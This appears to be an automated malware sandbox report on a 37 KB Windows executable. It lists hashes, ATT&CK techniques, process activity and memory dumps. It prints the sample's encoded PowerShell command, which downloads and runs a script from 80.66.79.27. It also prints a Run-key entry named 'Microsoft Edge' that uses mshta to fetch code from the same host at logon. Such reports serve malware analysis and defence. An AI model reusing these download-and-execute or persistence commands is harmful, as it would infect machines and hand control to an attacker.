c0273620d37a6ee12ce96c34b6f5428d712860c17541812d99b8ee23e9db95b9

Analysis

max time kernel
117s
max time network
120s
platform
windows7_x64
resource
win7-20230824-en
resource tags

arch:x64arch:x86image:win7-20230824-enlocale:en-usos:windows7-x64system
submitted
30/08/2023, 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34577f0fd1d3f1d5f53eecd0aca166c3.exe
Size

37KB
MD5

34577f0fd1d3f1d5f53eecd0aca166c3
SHA1

29ea28cb4255cde4c3e48daf291e76e5cfe7194c
SHA256

c0273620d37a6ee12ce96c34b6f5428d712860c17541812d99b8ee23e9db95b9
SHA512

6605c6d2403ebf7a1cdc0fc866e8c23a0b6967083d8fc66f633d26260e233d8f065941258d761dc599956ff55817961f86ac4ab8ff218c16db2ffa36ed586886
SSDEEP

768:VboCDsyNRn59FDXZFBVqt9OZPlyNRn59FDXZFBVqt9OZPWyNRn59FDXZFBVqt9OU:Vbo90/LDpDVqtoZPl0/LDpDVqtoZPW0K

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://80.66.79.27/o.png

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1568	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1528014236-771305907-3973026625-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge = "mshta vbscript:close(CreateObject(\"WScript.Shell\").run(\"mshta http://80.66.79.27\",0))"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1568	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1568	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2288 wrote to memory of 1568	2288	34577f0fd1d3f1d5f53eecd0aca166c3.exe	29
PID 2288 wrote to memory of 1568	2288	34577f0fd1d3f1d5f53eecd0aca166c3.exe	29
PID 2288 wrote to memory of 1568	2288	34577f0fd1d3f1d5f53eecd0aca166c3.exe	29

C:\Users\Admin\AppData\Local\Temp\34577f0fd1d3f1d5f53eecd0aca166c3.exe
"C:\Users\Admin\AppData\Local\Temp\34577f0fd1d3f1d5f53eecd0aca166c3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IAAkAGMAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABjADQAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAYwAzAD0AJwBhAGQAUwB0AHIAaQBuAGcAKAAnACcAaAB0AHQAcAA6AC8ALwA4ADAALgA2ADYALgA3ADkALgAyADcALwBvAC4AcABuAGcAJwAnACkAJwA7ACQAVABDAD0ASQBgAEUAYABYACAAKAAkAGMAMQAsACQAYwA0ACwAJABjADMAIAAtAEoAbwBpAG4AIAAnACcAKQB8AEkAYABFAGAAWAA=
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1568-11-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1568-7-0x000000001B450000-0x000000001B732000-memory.dmp

Filesize
2.9MB

Download
memory/1568-8-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

Filesize
9.6MB

Download
memory/1568-10-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1568-12-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1568-9-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/1568-13-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

Filesize
9.6MB

Download
memory/1568-14-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1568-15-0x0000000002AB0000-0x0000000002AC0000-memory.dmp

Filesize
64KB

Download
memory/1568-16-0x000007FEF6100000-0x000007FEF6A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2288-1-0x00000000009B0000-0x00000000009C0000-memory.dmp

Filesize
64KB

Download
memory/2288-2-0x000007FEF60B0000-0x000007FEF6A9C000-memory.dmp

Filesize
9.9MB

Download
memory/2288-0-0x000007FEF60B0000-0x000007FEF6A9C000-memory.dmp

Filesize
9.9MB

Download